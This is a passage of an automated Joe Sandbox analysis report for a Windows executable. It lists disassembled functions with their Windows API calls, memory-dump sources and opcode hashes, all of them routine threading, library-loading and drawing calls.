                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                              • Opcode ID: 55e29de437791ff059b18632f191397fb5b36eb1bc1dacbb6e1c39f812239a09
                                                                                                                                                                                                                                                                              • Instruction ID: 2afbdd8f5f01f541a3e106cf1da84f8ad1eb3ca53c567192d3892dd681395871
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55e29de437791ff059b18632f191397fb5b36eb1bc1dacbb6e1c39f812239a09
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93112BB6D00258BBC715ABAC9C09EDE7FADEB45322F208259F815D32D1D6BC8E048764
                                                                                                                                                                                                                                                                              Function 0071D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,?,0071D369,00000000,00000004,00000000), ref: 0071D588
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0071D594
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0071D59B
                                                                                                                                                                                                                                                                              • ResumeThread.KERNEL32(00000000), ref: 0071D5B9
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 173952441-0
                                                                                                                                                                                                                                                                              • Opcode ID: de1b1f8fe9af7c357612c2791cd7d6ed9cf3776cf7534ef73a6c431301c5c1fe
                                                                                                                                                                                                                                                                              • Instruction ID: 8dc5a59ec89125b92bf6bed4046612bdd58c21aeb91d3c2def51f2b6ee07d943
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de1b1f8fe9af7c357612c2791cd7d6ed9cf3776cf7534ef73a6c431301c5c1fe
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1401C472404114BBCB306BADEC09AEA7B6AEF81735F204215F925861E0DB789D90CBA1
                                                                                                                                                                                                                                                                              Function 006F7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F78B1
                                                                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 006F78C5
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 006F78CF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6297681fe30d76f472aa7104e2012ee4b89d2e323db4df3cd901142f4a1aa1a2
                                                                                                                                                                                                                                                                              • Instruction ID: 16682feea479bbbfb23f8ae6c849d54e29c18e54fea5556f8db88c7e68ddef6f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6297681fe30d76f472aa7104e2012ee4b89d2e323db4df3cd901142f4a1aa1a2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4211A97250514CBFEF125F90DC58EFABB6AFF083A4F144126FA2152260D7399C60EBA0
                                                                                                                                                                                                                                                                              Function 007233E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0072338D,00000364,00000000,00000000,00000000,?,007235FE,00000006,FlsSetValue), ref: 00723418
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0072338D,00000364,00000000,00000000,00000000,?,007235FE,00000006,FlsSetValue,00793260,FlsSetValue,00000000,00000364,?,007231B9), ref: 00723424
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0072338D,00000364,00000000,00000000,00000000,?,007235FE,00000006,FlsSetValue,00793260,FlsSetValue,00000000), ref: 00723432
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                              • Opcode ID: 11f55c5afcde5e0b41ee684e05dc71ec422857ea6ce8927f2636cb55394f05f7
                                                                                                                                                                                                                                                                              • Instruction ID: 648e96b9023356fa566dfc6ed1d1876da8c14803751d7e3e4ae537e09e47a183
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11f55c5afcde5e0b41ee684e05dc71ec422857ea6ce8927f2636cb55394f05f7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD012432651272ABCB32AB78BC44D663B58BF01BB17204260FA06D3180C72CCE01C7E4
                                                                                                                                                                                                                                                                              Function 0075BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0075B69A,?,00008000), ref: 0075BA8B
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0075B69A,?,00008000), ref: 0075BAB0
                                                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0075B69A,?,00008000), ref: 0075BABA
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0075B69A,?,00008000), ref: 0075BAED
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                              • Opcode ID: e802c7440c0e763a24649c6882992b527734eac444f8995dbc371e1e56a2359e
                                                                                                                                                                                                                                                                              • Instruction ID: 21d87af605a7a125bc80973fed6e1ae673c054aff72901951a9572dea0e8a861
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e802c7440c0e763a24649c6882992b527734eac444f8995dbc371e1e56a2359e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D117C30C0051DD7CF10EFE4E9496EEBB78BF09712F118085D941B2280DBB85A548BA5
                                                                                                                                                                                                                                                                              Function 0078886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0078888E
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 007888A6
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 007888CA
                                                                                                                                                                                                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007888E5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 357397906-0
                                                                                                                                                                                                                                                                              • Opcode ID: bcd8cb47009a95ec87cb4e930d3dd813dcac309fc21319b7ddeb5cf10ac229ba
                                                                                                                                                                                                                                                                              • Instruction ID: cee20e72b9f9b4bc614888ec0a2332b51e56a6ab614d19d421e2599aca26146b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcd8cb47009a95ec87cb4e930d3dd813dcac309fc21319b7ddeb5cf10ac229ba
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A31140B9D0020DAFDB51DFA8C884AEEBBB5FB08310F508166E915E2250E735AA54CF55
                                                                                                                                                                                                                                                                              Function 007536F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00753712
                                                                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00753723
                                                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0075372A
                                                                                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00753731
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                              • Opcode ID: d2450b8c58a72c0035c4e070e9df96538d4e135943cecf7c4bc44e5a7fb6a89d
                                                                                                                                                                                                                                                                              • Instruction ID: c7ed8a3e8ea1a591d0cce095cdcc01cedc683bfe206580fe707f7a1620f0f580
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2450b8c58a72c0035c4e070e9df96538d4e135943cecf7c4bc44e5a7fb6a89d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FE06DB1A412287ADA3017A2AC8DEEB7F6CDF46BE2F204415F505D20D0EAA98944C2B1
                                                                                                                                                                                                                                                                              Function 007892BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006F1F87
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: SelectObject.GDI32(?,00000000), ref: 006F1F96
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: BeginPath.GDI32(?), ref: 006F1FAD
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: SelectObject.GDI32(?,00000000), ref: 006F1FD6
                                                                                                                                                                                                                                                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 007892E3
                                                                                                                                                                                                                                                                              • LineTo.GDI32(?,?,?), ref: 007892F0
                                                                                                                                                                                                                                                                              • EndPath.GDI32(?), ref: 00789300
                                                                                                                                                                                                                                                                              • StrokePath.GDI32(?), ref: 0078930E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8ed05637d8c0b769d814444e03d906f5b359c4faf375345836f02c2b1479532e
                                                                                                                                                                                                                                                                              • Instruction ID: a268d6cf20b569ff0a9247bc97577d0972a9844573c32cf251a4655b3947d112
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ed05637d8c0b769d814444e03d906f5b359c4faf375345836f02c2b1479532e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EF0FE31085259BBDB226F54AC0EFDE3F5AAF0A320F24C104FB15650E2C77D59629BAD
                                                                                                                                                                                                                                                                              Function 006F21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(00000008), ref: 006F21BC
                                                                                                                                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 006F21C6
                                                                                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 006F21D9
                                                                                                                                                                                                                                                                              • GetStockObject.GDI32(00000005), ref: 006F21E1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                              • Opcode ID: 32d1b5b0cdf3367c5db12465c77701a79b53e8c80dace9b290d49e849177a057
                                                                                                                                                                                                                                                                              • Instruction ID: 86cc254f8a49ad64eeed5d3be91afc06de061e332e249276d863cff7197a5785
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32d1b5b0cdf3367c5db12465c77701a79b53e8c80dace9b290d49e849177a057
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31E06531680644AEDB315B74AC0DBE93B11AF11335F14C21AF7B5580E1C7794A509B15
                                                                                                                                                                                                                                                                              Function 0074EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0074EC36
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0074EC40
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0074EC60
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 0074EC81
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                              • Opcode ID: f50d534b405523df64d145ac942369a61e6383d1ca7ab8d4ecb0d832ade40d8b
                                                                                                                                                                                                                                                                              • Instruction ID: 218960c880ba25e4ea0a7deaed650bb38adbe19c49e37504101534d4c309cf86
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f50d534b405523df64d145ac942369a61e6383d1ca7ab8d4ecb0d832ade40d8b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59E0E570940208DFCB509FA09948A6DBBB2AB08310B208449F94AE3290D73C5901AF18
                                                                                                                                                                                                                                                                              Function 0074EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0074EC4A
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0074EC54
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0074EC60
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 0074EC81
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                              • Opcode ID: b740fd99a1913c8531c6ad5752e827f6a5cc0078561233cec179f6868e561dcb
                                                                                                                                                                                                                                                                              • Instruction ID: 75e405516f436967e62c3743dd474f4a712d118c006379a24afda3ad0cb96ede
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b740fd99a1913c8531c6ad5752e827f6a5cc0078561233cec179f6868e561dcb
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8E01A70D40208DFCB609FA0D84CA5DBBB2AF08310B208409F949E3290D73C59019F08
                                                                                                                                                                                                                                                                              Function 00743616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                                                                                              • String ID: @COM_EVENTOBJ$bnu
                                                                                                                                                                                                                                                                              • API String ID: 2948472770-255016743
                                                                                                                                                                                                                                                                              • Opcode ID: f0b78a074a99fadc832d1aaee351b405a1abdb3c860f2eefb3a9a805bce2e544
                                                                                                                                                                                                                                                                              • Instruction ID: 880653f3de55abdd6dc9a0126ff0b3afd99f1884cffcdbce2cee6fe1bcb9f486
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0b78a074a99fadc832d1aaee351b405a1abdb3c860f2eefb3a9a805bce2e544
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCF1AB70A08300DFD724DF14C885B6EB7E1BF84704F14891DF59A9B2A1DB79EA85CB92
                                                                                                                                                                                                                                                                              Function 007785DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 007105B2: EnterCriticalSection.KERNEL32(007C170C,?,00000000,?,006FD22A,007C3570,00000001,00000000,?,?,0076F023,?,?,00000000,00000001,?), ref: 007105BD
                                                                                                                                                                                                                                                                                • Part of subcall function 007105B2: LeaveCriticalSection.KERNEL32(007C170C,?,006FD22A,007C3570,00000001,00000000,?,?,0076F023,?,?,00000000,00000001,?,00000001,007C2430), ref: 007105FA
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
